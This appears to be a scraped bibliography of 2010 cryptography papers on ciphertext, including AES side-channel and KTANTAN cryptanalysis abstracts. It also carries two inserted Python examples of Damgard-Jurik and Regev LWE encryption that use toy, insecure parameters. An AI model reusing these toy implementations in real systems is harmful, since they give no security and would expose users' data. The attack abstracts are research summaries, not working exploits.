Showing papers on "Ciphertext published in 2010"


Book ChapterDOI
01 Jun 2010
TL;DR: Encryption-decryption is the most ancient cryptographic activity, but its nature has deeply changed with the invention of computers, because the cryptanalysis (the activity of the third person, the eavesdropper, who aims at recovering the message) can use their power.
Abstract: Introduction A fundamental objective of cryptography is to enable two persons to communicate over an insecure channel (a public channel such as the internet) in such a way that any other person is unable to recover their message (called the plaintext ) from what is sent in its place over the channel (the ciphertext ). The transformation of the plaintext into the ciphertext is called encryption , or enciphering. Encryption-decryption is the most ancient cryptographic activity (ciphers already existed four centuries b.c.), but its nature has deeply changed with the invention of computers, because the cryptanalysis (the activity of the third person, the eavesdropper, who aims at recovering the message) can use their power. The encryption algorithm takes as input the plaintext and an encryption key K E , and it outputs the ciphertext. If the encryption key is secret, then we speak of conventional cryptography , of private key cryptography , or of symmetric cryptography . In practice, the principle of conventional cryptography relies on the sharing of a private key between the sender of a message (often called Alice in cryptography) and its receiver (often called Bob). If, on the contrary, the encryption key is public, then we speak of public key cryptography . Public key cryptography appeared in the literature in the late 1970s.

943 citations


Posted Content
TL;DR: In this paper, the authors proposed a multi-authority attribute-based encryption (ABE) system, where any party can become an authority and there is no requirement for any global coordination other than the creation of an initial set of common reference parameters.
Abstract: We propose a Multi-Authority Attribute-Based Encryption (ABE) system. In our system, any party can become an authority and there is no requirement for any global coordination other than the creation of an initial set of common reference parameters. A party can simply act as an ABE authority by creating a public key and issuing private keys to different users that reflect their attributes. A user can encrypt data in terms of any boolean formula over attributes issued from any chosen set of authorities. Finally, our system does not require any central authority. In constructing our system, our largest technical hurdle is to make it collusion resistant. Prior Attribute-Based Encryption systems achieved collusion resistance when the ABE system authority “tied” together different components (representing different attributes) of a user’s private key by randomizing the key. However, in our system each component will come from a potentially different authority, where we assume no coordination between such authorities. We create new techniques to tie key components together and prevent collusion attacks between users with different global identifiers. We prove our system secure using the recent dual system encryption methodology where the security proof works by first converting the challenge ciphertext and private keys to a semi-functional form and then arguing security. We follow a recent variant of the dual system proof technique due to Lewko and Waters and build our system using bilinear groups of composite order. We prove security under similar static assumptions to the LW paper in the random oracle model.

829 citations


Book ChapterDOI
26 May 2010
TL;DR: This work presents a fully homomorphic encryption scheme which has both relatively small key and ciphertext size and allows efficient fully homomorphism over any field of characteristic two.
Abstract: We present a fully homomorphic encryption scheme which has both relatively small key and ciphertext size. Our construction follows that of Gentry by producing a fully homomorphic scheme from a “somewhat” homomorphic scheme. For the somewhat homomorphic scheme the public and private keys consist of two large integers (one of which is shared by both the public and private key) and the ciphertext consists of one large integer. As such, our scheme has smaller message expansion and key size than Gentry’s original scheme. In addition, our proposal allows efficient fully homomorphic encryption over any field of characteristic two.

816 citations


Proceedings ArticleDOI
13 Apr 2010
TL;DR: This paper uniquely integrates the technique of proxy re-encryption with CP-ABE, and enables the authority to delegate most of laborious tasks to proxy servers, and shows that the proposed scheme is provably secure against chosen ciphertext attacks.
Abstract: Ciphertext-Policy Attribute Based Encryption (CP-ABE) is a promising cryptographic primitive for fine-grained access control of shared data. In CP-ABE, each user is associated with a set of attributes and data are encrypted with access structures on attributes. A user is able to decrypt a ciphertext if and only if his attributes satisfy the ciphertext access structure. Besides this basic property, practical applications usually have other requirements. In this paper we focus on an important issue of attribute revocation which is cumbersome for CP-ABE schemes. In particular, we resolve this challenging issue by considering more practical scenarios in which semi-trustable on-line proxy servers are available. As compared to existing schemes, our proposed solution enables the authority to revoke user attributes with minimal effort. We achieve this by uniquely integrating the technique of proxy re-encryption with CP-ABE, and enable the authority to delegate most of the laborious tasks to proxy servers. Formal analysis shows that our proposed scheme is provably secure against chosen ciphertext attacks. In addition, we show that our technique is also applicable to the Key-Policy Attribute Based Encryption (KP-ABE) counterpart.

720 citations


Journal ArticleDOI
Wan Qin, Xiang Peng
TL;DR: Owing to the nonlinear operation of phase truncation, high robustness against existing attacks could be achieved and a set of simulation results shows the validity of proposed asymmetric cryptosystem.
Abstract: We propose an asymmetric cryptosystem based on a phase-truncated Fourier transform. With phase truncation in Fourier transform, one is able to produce an asymmetric ciphertext as real-valued and stationary white noise by using two random phase keys as public keys, while a legal user can retrieve the plaintext using another two different private phase keys in the decryption process. Owing to the nonlinear operation of phase truncation, high robustness against existing attacks could be achieved. A set of simulation results shows the validity of proposed asymmetric cryptosystem.

478 citations


Book ChapterDOI
15 Aug 2010
TL;DR: In this paper, the authors presented a technique for delegating a short lattice basis that has the advantage of keeping the lattice dimension unchanged upon delegation, and constructed two new hierarchical identity-based encryption (HIBE) schemes, with and without random oracles.
Abstract: We present a technique for delegating a short lattice basis that has the advantage of keeping the lattice dimension unchanged upon delegation. Building on this result, we construct two new hierarchical identity-based encryption (HIBE) schemes, with and without random oracles. The resulting systems are very different from earlier lattice-based HIBEs and in some cases result in shorter ciphertexts and private keys. We prove security from classic lattice hardness assumptions.

382 citations


Posted Content
TL;DR: In this paper, the authors present a side channel attack for AES-128, where the plaintext can be recovered without having access to the ciphertext, and their attack can be run under an unprivileged user account.
Abstract: Side channel attacks on cryptographic systems are attacks exploiting information gained from physical implementations rather than utilizing theoretical weaknesses of a scheme. In particular, during the last years, major achievements were made for the class of access-driven cache-attacks. The source of information leakage for such attacks are the locations of memory accesses performed by a victim process. In this paper we analyze the case of AES and present an attack which is capable of recovering the full secret key in almost realtime for AES-128, requiring only a very limited number of observed encryptions. Unlike most other attacks, ours neither needs to know the ciphertext, nor does it need to know any information about the plaintext (such as its distribution, etc.). Moreover, for the first time we also show how the plaintext can be recovered without having access to the ciphertext. Further, our spy process can be run under an unprivileged user account. It is the first working attack for implementations using compressed tables, where it is not possible to find out the beginning of AES rounds any more – a corner stone for all efficient previous attacks. All results of our attack have been demonstrated by a fully working implementation, and do not solely rely on theoretical considerations or simulations. A contribution of probably independent interest is a denial of service attack on the scheduler of current Linux systems (CFS), which allows memory accesses to be monitored with novel precision. Finally, we give some generalizations of our attack, and suggest some possible countermeasures which would render our attack impossible. Keywords: AES; side channel; access-based cache attacks.

371 citations


Book ChapterDOI
03 May 2010
TL;DR: The unidirectional proxy re-encryption scheme of Shao and Cao (PKC 2009) is shown to be vulnerable to chosen-ciphertext attack (CCA), and an efficient CCA-secure unidirectional PRE scheme without pairings is proposed, proven under the computational Diffie-Hellman assumption in the random oracle model.
Abstract: Proxy re-encryption (PRE) allows a semi-trusted proxy to convert a ciphertext originally intended for Alice into one encrypting the same plaintext for Bob. The proxy only needs a re-encryption key given by Alice, and cannot learn anything about the plaintext encrypted. This adds flexibility in various applications, such as confidential email, digital rights management and distributed storage. In this paper, we study unidirectional PRE, in which the re-encryption key only enables delegation in one direction but not the opposite. In PKC 2009, Shao and Cao proposed a unidirectional PRE assuming the random oracle. However, we show that it is vulnerable to chosen-ciphertext attack (CCA). We then propose an efficient unidirectional PRE scheme (without resorting to pairings). We gain high efficiency and CCA-security using the “token-controlled encryption” technique, under the computational Diffie-Hellman assumption, in the random oracle model and a relaxed but reasonable definition.

299 citations


Proceedings ArticleDOI
16 May 2010
TL;DR: This work designs a method for creating public key broadcast encryption systems based on a new "two equation" technique for revoking users, and shows that the techniques can be used to realize Attribute-Based Encryption (ABE) systems with non-monotonic access formulas, where the key storage is significantly more efficient than previous solutions.
Abstract: In this work, we design a method for creating public key broadcast encryption systems. Our main technical innovation is based on a new "two equation" technique for revoking users. This technique results in two key contributions: First, our new scheme has ciphertext size overhead $O(r)$, where $r$ is the number of revoked users, and the size of public and private keys is only a constant number of group elements from an elliptic-curve group of prime order. In addition, the public key allows us to encrypt to an unbounded number of users. Our system is the first to achieve such parameters. We give two versions of our scheme: a simpler version which we prove to be selectively secure in the standard model under a new, but non-interactive assumption, and another version that employs the new dual system encryption technique of Waters to obtain adaptive security under the d-BDH and decisional Linear assumptions. Second, we show that our techniques can be used to realize Attribute-Based Encryption (ABE) systems with non-monotonic access formulas, where our key storage is significantly more efficient than previous solutions. This result is also proven selectively secure in the standard model under our new non-interactive assumption.

254 citations


Journal ArticleDOI
TL;DR: A generalization of Paillier’s probabilistic public-key system, in which the expansion factor is reduced and which allows to adjust the block length of the scheme even after the public key has been fixed, without losing the homomorphic property is proposed.
Abstract: We propose a generalization of Paillier’s probabilistic public-key system, in which the expansion factor is reduced and which allows to adjust the block length of the scheme even after the public key has been fixed, without losing the homomorphic property. We show that the generalization is as secure as Paillier’s original system and propose several ways to optimize implementations of both the generalized and the original scheme. We construct a threshold variant of the generalized scheme as well as zero-knowledge protocols to show that a given ciphertext encrypts one of a set of given plaintexts, and protocols to verify multiplicative relations on plaintexts. We then show how these building blocks can be used for applying the scheme to efficient electronic voting. This reduces dramatically the work needed to compute the final result of an election, compared to the previously best known schemes. We show how the basic scheme for a yes/no vote can be easily adapted to casting a vote for up to t out of L candidates. The same basic building blocks can also be adapted to provide receipt-free elections, under appropriate physical assumptions. The scheme for 1 out of L elections can be optimized such that for a certain range of the other parameter values, the ballot size is logarithmic in L.

210 citations
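The generalized scheme described in the abstract above, as an added example that is not the paper's own code: encryption is done modulo n^(s+1) with the block length s chosen per ciphertext under a fixed public key, ciphertext multiplication adds plaintexts, and a yes/no ballot and a 1-out-of-L ballot are tallied homomorphically. Decryption here recovers m from (1+n)^m with a truncated n-adic logarithm, which is an alternative to the paper's own recursive decryption procedure; the toy primes, the plaintexts and the ballots are constructed for illustration and give no security. The threshold variant and the zero-knowledge proofs of the paper are not shown.

```python
"""Damgard-Jurik style generalisation of Paillier with adjustable block length s.

Added example (not code from the paper above). Toy primes are far too small for
real use; the sample plaintexts and ballots are constructed here.
"""
from math import gcd
import secrets


def _lcm(a, b):
    return a * b // gcd(a, b)


def keygen(p, q):
    """The public key fixes n only; the block length s is chosen per ciphertext."""
    n = p * q
    lam = _lcm(p - 1, q - 1)
    assert gcd(n, lam) == 1
    return n, lam


def encrypt(n, s, m, r=None):
    """c = (1+n)^m * r^(n^s) mod n^(s+1); the plaintext space is Z_{n^s}."""
    ns, mod = n ** s, n ** (s + 1)
    assert 0 <= m < ns, "plaintext must fit the chosen block length"
    while r is None or gcd(r, n) != 1:
        r = 2 + secrets.randbelow(n - 2)
    return pow(1 + n, m, mod) * pow(r, ns, mod) % mod


def _nlog(a, n, s):
    """Truncated n-adic logarithm of a (a ≡ 1 mod n), reduced mod n^(s+1).

    log(1+x) = x - x^2/2 + x^3/3 - ...; terms beyond k = s vanish because
    x ≡ 0 (mod n), and s < p, q keeps every 1/k invertible.  On the subgroup
    generated by 1+n this is a homomorphism, so log((1+n)^m) = m * log(1+n).
    """
    mod = n ** (s + 1)
    x = (a - 1) % mod
    acc, xk = 0, 1
    for k in range(1, s + 1):
        xk = xk * x % mod
        term = xk * pow(k, -1, mod) % mod
        acc = (acc + term) if k % 2 else (acc - term)
    return acc % mod


def decrypt(n, lam, s, c):
    """Strip the r^(n^s) part with d, then take the discrete log in <1+n>."""
    ns, mod = n ** s, n ** (s + 1)
    d = lam * pow(lam, -1, ns)          # d ≡ 0 (mod λ), d ≡ 1 (mod n^s)
    a = pow(c, d, mod)                  # a = (1+n)^m mod n^(s+1)
    # log(a) and log(1+n) are both multiples of n; divide and solve mod n^s
    return (_nlog(a, n, s) // n) * pow(_nlog(1 + n, n, s) // n, -1, ns) % ns


def add(n, s, c1, c2):
    """Homomorphic addition of plaintexts: multiply ciphertexts mod n^(s+1)."""
    return c1 * c2 % n ** (s + 1)


def tally(n, s, ballots):
    """Aggregate encrypted ballots without decrypting any single one."""
    acc = encrypt(n, s, 0)
    for c in ballots:
        acc = add(n, s, acc, c)
    return acc


def encode_vote(candidate, voters):
    """1-out-of-L ballot: candidate j is encoded as M^j with M = voters + 1,
    so the homomorphic sum is a base-M number whose digit j counts candidate j."""
    return (voters + 1) ** candidate


def decode_counts(total, candidates, voters):
    base = voters + 1
    return [total // base ** j % base for j in range(candidates)]


if __name__ == "__main__":
    n, lam = keygen(1009, 1013)                       # toy primes, no security
    print(decrypt(n, lam, 2, encrypt(n, 2, 10 ** 11)))   # s = 2 under the same n
    ballots = [encrypt(n, 1, encode_vote(c, 5)) for c in (0, 2, 2, 1, 2)]
    print(decode_counts(decrypt(n, lam, 1, tally(n, 1, ballots)), 3, 5))
```

The same n serves every block length: a ciphertext with s = 1 is ordinary Paillier, and s = 2 or 3 packs a larger plaintext into the same key without losing the additive homomorphism. Correctness of the logarithm trick needs the primes to exceed s, which any real parameter choice satisfies.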


Book ChapterDOI
09 Feb 2010
TL;DR: This work provides a provable-security treatment of “robust” encryption, arguing that it is an essential conjunct of anonymous encryption, and provides transforms that do achieve it, efficiently and provably.
Abstract: We provide a provable-security treatment of “robust” encryption. Robustness means it is hard to produce a ciphertext that is valid for two different users. Robustness makes explicit a property that has been implicitly assumed in the past. We argue that it is an essential conjunct of anonymous encryption. We show that natural anonymity-preserving ways to achieve it, such as adding recipient identification information before encrypting, fail. We provide transforms that do achieve it, efficiently and provably. We assess the robustness of specific encryption schemes in the literature, providing simple patches for some that lack the property. We present various applications. Our work enables safer and simpler use of encryption.

Book ChapterDOI
05 Dec 2010
TL;DR: Three new cryptanalytic techniques give the first non-marginal single-key attack on 8-round AES-192, about a million times faster than exhaustive key search and needing only about 1/32,000 of the full codebook, and lower the best known time complexities for the other 7-round and 8-round attacks on AES-192 and AES-256.
Abstract: AES is the most widely used block cipher today, and its security is one of the most important issues in cryptanalysis. After 13 years of analysis, related-key attacks were recently found against two of its flavors (AES-192 and AES-256). However, such a strong type of attack is not universally accepted as a valid attack model, and in the more standard single-key attack model at most 8 rounds of these two versions can be currently attacked. In the case of 8-round AES-192, the only known attack (found 10 years ago) is extremely marginal, requiring the evaluation of essentially all the 2^128 possible plaintext/ciphertext pairs in order to speed up exhaustive key search by a factor of 16. In this paper we introduce three new cryptanalytic techniques, and use them to get the first non-marginal attack on 8-round AES-192 (making its time complexity about a million times faster than exhaustive search, and reducing its data complexity to about 1/32,000 of the full codebook). In addition, our new techniques can reduce the best known time complexities for all the other combinations of 7-round and 8-round AES-192 and AES-256.

Journal ArticleDOI
TL;DR: An anonymous multireceiver identity-based encryption scheme where Lagrange interpolating polynomial mechanisms are adopted to make it impossible for an attacker or any other message receiver to derive the identity of a message receiver such that the privacy of every receiver can be guaranteed.
Abstract: Recently, many multireceiver identity-based encryption schemes have been proposed in the literature. However, none of these schemes can protect the privacy of message receivers. In this paper, we present an anonymous multireceiver identity-based encryption scheme where we adopt Lagrange interpolating polynomial mechanisms to cope with the above problem. Our scheme makes it impossible for an attacker or any other message receiver to derive the identity of a message receiver, such that the privacy of every receiver can be guaranteed. Furthermore, the proposed scheme is quite receiver efficient since each of the receivers merely needs to perform two pairing computations to decrypt the received ciphertext. We prove that our scheme is secure against adaptive chosen plaintext attacks and adaptive chosen ciphertext attacks. Finally, we also formally show that every receiver in the proposed scheme is anonymous to any other receiver.

Journal ArticleDOI
TL;DR: The number of additional bits required from chosen plain text attack-secure CP-ABE to chosen ciphertext attack- secure CP- ABE is reduced by 90% with respect to that of the previous scheme.
Abstract: An Attribute-Based Encryption (ABE) is an encryption scheme where users with some attributes can decrypt ciphertexts associated with these attributes. The length of the ciphertext depends on the number of attributes in previous ABE schemes. In this paper, we propose a new Ciphertext-Policy Attribute-Based Encryption (CP-ABE) with constant ciphertext length. In our scheme, the number of pairing computations is also constant. In addition, the number of additional bits required from chosen plaintext attack-secure CP-ABE to chosen ciphertext attack-secure CP-ABE is reduced by 90% with respect to that of the previous scheme.

Book ChapterDOI
15 Dec 2010
TL;DR: This work presents a novel ciphertext policy attribute-based proxy re-encryption (CP-AB-PRE) scheme that satisfies the properties of PRE, such as unidirectionality, non-interactivity and multi-use.
Abstract: We present a novel ciphertext policy attribute-based proxy re-encryption (CP-AB-PRE) scheme. The ciphertext policy realized in our scheme is AND-gates policy supporting multi-value attributes, negative attributes and wildcards. Our scheme satisfies the properties of PRE, such as unidirectionality, non-interactivity and multi-use. Moreover, the proposed scheme has master key security, allows the encryptor to decide whether the ciphertext can be re-encrypted and allows the proxy to add access policy when re-encrypting ciphertext. Furthermore, our scheme can be modified to have constant ciphertext size in original encryption.

Book ChapterDOI
12 Aug 2010
TL;DR: In this paper, the authors describe a variant of existing meet-in-the-middle attacks on block ciphers, which are applicable to the KTANTAN family of block Ciphers accepting a key of 80 bits and show that strong related-key property can translate to a successful attack in the non-related-key setting.
Abstract: In this paper we describe a variant of existing meet-in-the-middle attacks on block ciphers. As an application, we propose meet-in-the-middle attacks that are applicable to the KTANTAN family of block ciphers accepting a key of 80 bits. The attacks are due to some weaknesses in its bitwise key schedule. We report an attack of time complexity 2^75.170 encryptions on the full KTANTAN32 cipher with only 3 plaintext/ciphertext pairs, as well as 2^75.044 encryptions on the full KTANTAN48 and 2^75.584 encryptions on the full KTANTAN64 with 2 plaintext/ciphertext pairs. All these attacks work in the classical attack model without any related keys. In the differential related-key model, we demonstrate 218- and 174-round differentials holding with probability 1. This shows that a strong related-key property can translate to a successful attack in the non-related-key setting. Having extremely low data requirements, these attacks are valid even in RFID-like environments where only a very limited amount of text material may be available to an attacker.

Book ChapterDOI
01 Mar 2010
TL;DR: This paper shows how to use asymmetric pairings to convert a large family of IBE and HIBE constructions into anonymous IBE/HIBE systems and obtains a delegatable-HVE which is a generalization of anonymous H IBE.
Abstract: A Hierarchical Identity Based Encryption (HIBE) system is anonymous if the ciphertext reveals no information about the recipient's identity. While there are multiple constructions for secure HIBE, far fewer constructions exist for anonymous HIBE. In this paper we show how to use asymmetric pairings to convert a large family of IBE and HIBE constructions into anonymous IBE and HIBE systems. We also obtain a delegatable-HVE which is a generalization of anonymous HIBE.

Journal ArticleDOI
TL;DR: The computer simulation results show that the proposed encryption algorithm is sensitive to the multiple keys, and that it has considerable robustness, noise immunity and security.

Journal ArticleDOI
TL;DR: This paper provides a threshold multi authority fuzzy identity based encryption (MA-FIBE) scheme without a central authority for the first time.

Proceedings ArticleDOI
04 Oct 2010
TL;DR: New fully collusion-resistant trace & revoke schemes built on prime-order bilinear groups, secure under the Decisional Linear or the External Diffie-Hellman (XDH) assumption, replace the composite-order groups of the earlier traitor tracing schemes of Boneh et al. and give smaller ciphertexts and faster encryption and decryption.
Abstract: In [8,9] Boneh et al. presented the first fully collusion-resistant traitor tracing and trace & revoke schemes. These schemes are based on composite order bilinear groups and their security depends on the hardness of the subgroup decision assumption. In this paper we present new, efficient trace & revoke schemes which are based on prime order bilinear groups, and whose security depends on the hardness of the Decisional Linear Assumption or the External Diffie-Hellman (XDH) assumption. This allows our schemes to be flexible and thus much more efficient than existing schemes in terms of a variety of parameters including ciphertext size, encryption time, and decryption time. For example, if encryption time was the major parameter of concern, then for the same level of practical security as [8] our scheme encrypts 6 times faster. Decryption is 10 times faster. The ciphertext size in our scheme is 50% less when compared to [8]. We provide the first implementations of efficient fully collusion-resilient traitor tracing and trace & revoke schemes. The ideas used in this paper can be used to make other cryptographic schemes based on composite order bilinear groups efficient as well.

Book ChapterDOI
30 May 2010
TL;DR: This contribution devise a new solution to the selective opening problem that does not build on lossy encryption and combines techniques from non-committing encryption and hash proof systems with a new technique to glue several ciphertext parts together, resulting in a rather practical SO-CCA secure public-key encryption scheme thatdoes not suffer from the efficiency drawbacks of known schemes.
Abstract: Imagine many small devices send data to a single receiver, encrypted using the receiver’s public key. Assume an adversary that has the power to adaptively corrupt a subset of these devices. Given the information obtained from these corruptions, do the ciphertexts from uncorrupted devices remain secure? Recent results suggest that conventional security notions for encryption schemes (like IND-CCA security) do not suffice in this setting. To fill this gap, the notion of security against selective-opening attacks (SOA security) has been introduced. It has been shown that lossy encryption implies SOA security against a passive, i.e., only eavesdropping and corrupting, adversary (SO-CPA). However, the known results on SOA security against an active adversary (SO-CCA) are rather limited. Namely, while there exist feasibility results, the (time and space) complexity of currently known SO-CCA secure schemes depends on the number of devices in the setting above. In this contribution, we devise a new solution to the selective opening problem that does not build on lossy encryption. Instead, we combine techniques from non-committing encryption and hash proof systems with a new technique (dubbed “cross-authentication codes”) to glue several ciphertext parts together. The result is a rather practical SO-CCA secure public-key encryption scheme that does not suffer from the efficiency drawbacks of known schemes. Since we build upon hash proof systems, our scheme can be instantiated using standard number-theoretic assumptions such as decisional Diffie-Hellman (DDH), decisional composite residuosity (DCR), and quadratic residuosity (QR). Besides, we construct a conceptually very simple and comparatively efficient SO-CPA secure scheme from (slightly enhanced) trapdoor one-way permutations.
We stress that our schemes are completely independent of the number of challenge ciphertexts, and we do not make assumptions about the underlying message distribution (beyond being efficiently samplable). In particular, we do not assume efficient conditional re-samplability of the message distribution. Hence, our schemes are secure in arbitrary settings, even if it is not known in advance how many ciphertexts might be considered for corruptions.

Posted Content
TL;DR: In this article, the authors proposed a new construction of CP-ABE, which significantly reduces the ciphertext to a constant size for an AND gate access policy with any given number of attributes.
Abstract: Ciphertext Policy Attribute Based Encryption (CP-ABE) enforces an expressive data access policy, which consists of a number of attributes connected by logical gates. Only those decryptors whose attributes satisfy the data access policy can decrypt the ciphertext. CP-ABE is very appealing since the ciphertext and data access policies are integrated together in a natural and effective way. However, all existing CP-ABE schemes incur very large ciphertext size, which increases linearly with respect to the number of attributes in the access policy. Large ciphertext prevents CP-ABE from being adopted in communication constrained environments. In this paper, we propose a new construction of CP-ABE, named Constant-size CP-ABE (denoted as CCP-ABE), that significantly reduces the ciphertext to a constant size for an AND gate access policy with any given number of attributes. Each ciphertext in CCP-ABE requires only 2 elements on a bilinear group. Based on CCP-ABE, we further propose an Attribute Based Broadcast Encryption (ABBE) scheme. Compared to existing Broadcast Encryption (BE) schemes, ABBE is more flexible because a broadcasted message can be encrypted by an expressive access policy, either with or without explicitly specifying the receivers. Moreover, ABBE significantly reduces the storage and communication overhead to the order of O(log N), where N is the system size. Also, we prove, using information theoretical approaches, that ABBE attains the minimal bound on storage overhead for each user to construct all possible subgroups in the communication system.

Book ChapterDOI
09 Feb 2010
TL;DR: In this paper, a new variant of Regev's cryptosystem was presented, with a new choice of parameters, based on the worst-case lattice problem GapSVP.
Abstract: We present a variant of Regev’s cryptosystem first presented in [Reg05], but with a new choice of parameters. By a recent classical reduction by Peikert we prove the scheme semantically secure based on the worst-case lattice problem GapSVP. From this we construct a threshold cryptosystem which has a very efficient and non-interactive decryption protocol. We prove the threshold cryptosystem secure against passive adversaries corrupting all but one of the players, and against active adversaries corrupting less than one third of the players. We also describe how one can build a distributed key generation protocol. In the final part of the paper we show how one can, in zero-knowledge, prove knowledge of the plaintext contained in a given ciphertext from Regev’s original cryptosystem or our variant. The proof is of size only a constant times the size of the public key.
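Regev's cryptosystem as referred to in the abstract above, as an added example that is not the paper's code and does not use the paper's parameters: the public key is a batch of LWE samples (A, b = As + e), a bit is encrypted by summing a random subset of the samples and adding q/2 for a 1, and decryption checks whether v - <u, s> is closer to 0 or to q/2. The threshold part below is an illustrative simplification assumed here, not the paper's protocol: the secret key is additively shared over Z_q, each party publishes <u, s_j> without talking to the others, and the combiner sums the partial results. The modulus, dimension, sample count and error bound are toy values with no security; they are chosen so that the accumulated error stays below q/4 and decryption never fails.

```python
"""Regev-style LWE encryption of single bits, with an additive-sharing threshold
decryption. Added example; parameters and the sharing scheme are illustrative
assumptions, not the paper's choices, and give no security."""
import secrets

Q, N, M, ERR = 7681, 32, 128, 2   # toy modulus, dimension, samples, error bound
# worst case |sum of selected errors| <= M * ERR = 256 < Q // 4 = 1920, so
# decryption is always correct for these constants


def _rand_err():
    return secrets.randbelow(2 * ERR + 1) - ERR


def keygen():
    """Secret s in Z_q^N; public key is M LWE samples (a_i, <a_i, s> + e_i)."""
    s = [secrets.randbelow(Q) for _ in range(N)]
    A = [[secrets.randbelow(Q) for _ in range(N)] for _ in range(M)]
    b = [(sum(a * si for a, si in zip(row, s)) + _rand_err()) % Q for row in A]
    return (A, b), s


def encrypt(pk, bit):
    """Sum a random subset of the samples; add q/2 to the b-part for a 1 bit."""
    A, b = pk
    u, v = [0] * N, 0
    for row, bi in zip(A, b):
        if secrets.randbits(1):
            u = [(ui + ai) % Q for ui, ai in zip(u, row)]
            v = (v + bi) % Q
    return u, (v + bit * (Q // 2)) % Q


def _centered(x):
    """Representative of x mod q in (-q/2, q/2]."""
    x %= Q
    return x - Q if x > Q // 2 else x


def _round_bit(noisy):
    # noisy = sum of selected errors (+ q/2 if the bit was 1)
    return int(abs(_centered(noisy)) > Q // 4)


def decrypt(s, ct):
    u, v = ct
    return _round_bit(v - sum(ui * si for ui, si in zip(u, s)))


def share_key(s, parties):
    """Additive sharing of s over Z_q: every party is needed to decrypt."""
    assert parties >= 2
    shares = [[secrets.randbelow(Q) for _ in range(N)] for _ in range(parties - 1)]
    last = [(si - sum(col)) % Q for si, col in zip(s, zip(*shares))]
    return shares + [last]


def partial_decrypt(share, ct):
    """Each party publishes <u, s_j> mod q; no interaction between parties."""
    u, _ = ct
    return sum(ui * sj for ui, sj in zip(u, share)) % Q


def combine(ct, partials):
    """Sum of the partials is <u, s>, so the combiner finishes like decrypt()."""
    _, v = ct
    return _round_bit(v - sum(partials))


if __name__ == "__main__":
    pk, s = keygen()
    ct = encrypt(pk, 1)
    print(decrypt(s, ct))
    print(combine(ct, [partial_decrypt(sh, ct) for sh in share_key(s, 3)]))
```

In this simplified sharing the partial values <u, s_j> together reveal <u, s> exactly, which is what makes the combine step work; a threshold scheme that must also tolerate corrupted parties, as the paper's does, needs more than plain additive shares.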

Proceedings ArticleDOI
04 Oct 2010
TL;DR: In this paper, the authors propose a new construction of CP-ABE, named Constant-size CP-ABE (CCP-ABE), which reduces the ciphertext to a constant size for an AND gate access policy with any given number of attributes.
Abstract: Existing CP-ABE schemes incur very large ciphertext size, which increases linearly with respect to the number of attributes in the access policy. Large ciphertext prevents CP-ABE from being adopted in communication constrained environments. In this paper, we propose a new construction of CP-ABE, named Constant-size CP-ABE (denoted as CCP-ABE), that significantly reduces the ciphertext to a constant size for an AND gate access policy with any given number of attributes. Each ciphertext in CCP-ABE requires only elements on a bilinear group. Based on CCP-ABE, we further propose an Attribute Based Broadcast Encryption (ABBE) scheme. Compared to existing Broadcast Encryption (BE) schemes, ABBE is more flexible because a broadcasted message can be encrypted by an expressive access policy, either with or without explicitly specifying the receivers. Moreover, ABBE significantly reduces the storage and communication overhead to the order of $O(\log N)$, where $N$ is the system size.

Patent
30 Mar 2010
TL;DR: In this paper, a computer readable storage medium tangibly embodying a program of instructions executable by a machine for performing operations including: receiving information B to be encrypted as a ciphertext C in accordance with an encryption scheme having an encrypt function; and encrypting B in accordance with the encrypt function to obtain C, the scheme utilizes at least one public key A, where B, C, and A are matrices, the encryption function receives as inputs A and B and outputs C as C → AS + pX + B (mod q), S is a random matrix, X
Abstract: In one exemplary embodiment, a computer readable storage medium tangibly embodying a program of instructions executable by a machine for performing operations including: receiving information B to be encrypted as a ciphertext C in accordance with an encryption scheme having an encrypt function; and encrypting B in accordance with the encrypt function to obtain C, the scheme utilizes at least one public key A, where B, C, and A are matrices, the encrypt function receives as inputs A and B and outputs C as C → AS + pX + B (mod q), where S is a random matrix, X is an error matrix, p is an integer, and q is an odd prime number. In other exemplary embodiments, the encryption scheme includes a decrypt function that receives as inputs at least one private key T (a matrix) and C and outputs B as B = T^{-1} · (T C T^t mod q) · (T^t)^{-1} mod p.

Patent
16 Mar 2010
TL;DR: In this patent, an integrated circuit includes an arithmetic circuit whose input/output characteristics are determined by element-specific physical characteristics, and a storage unit holding a predetermined input value together with cipher text obtained by encrypting predetermined secret information under the output value that the arithmetic circuit produces for that input.
Abstract: There is provided an integrated circuit that includes: an arithmetic circuit having input/output characteristics determined by element-specific physical characteristics; a storage unit storing a predetermined value together with cipher text obtained by encrypting predetermined secret information using the output value that the arithmetic circuit produces when that predetermined value is input; and a decryption unit that, when the secret information is to be used, restores it by feeding the stored predetermined value into the arithmetic circuit and decrypting the stored cipher text with the resulting output value.

Book ChapterDOI
Satoshi Hada
30 May 2010
TL;DR: This paper proposes a special ES functionality, which is the sequential composition of Waters's signature scheme and the linear encryption scheme proposed by Boneh, Boyen, and Shacham, constructs a secure obfuscator for it, and proves that the proposed obfuscator satisfies a virtual black-box property (VBP), which guarantees that the security of the signature scheme is preserved even when adversaries are given an obfuscated program.
Abstract: Obfuscation is one of the most intriguing open problems in cryptography and only a few positive results are known. In TCC’07, Hohenberger et al. proposed an obfuscator for a re-encryption functionality, which takes a ciphertext for a message encrypted under Alice’s public key and transforms it into a ciphertext for the same message under Bob’s public key [24]. It is the first complicated cryptographic functionality that can be securely obfuscated, but obfuscators for such cryptographic functionalities are still elusive. In this paper, we consider obfuscation for encrypted signature (ES) functionalities, which generate a signature on a given message under Alice’s secret signing key and encrypt the signature under Bob’s public encryption key. We propose a special ES functionality, which is the sequential composition of Waters’s signature scheme [33] and the linear encryption scheme proposed by Boneh, Boyen, and Shacham [5], and construct a secure obfuscator for it. We follow the security argument by Hohenberger et al. to prove that our proposed obfuscator satisfies a virtual black-box property (VBP), which guarantees that the security of the signature scheme is preserved even when adversaries are given an obfuscated program. Our security argument is in the standard model.

Book ChapterDOI
05 Jul 2010
TL;DR: A generic one-round AB-AKE protocol that satisfies the AKE-security notion is presented and is generically constructed from any EP-AB-KEM that achieves chosen ciphertext security.
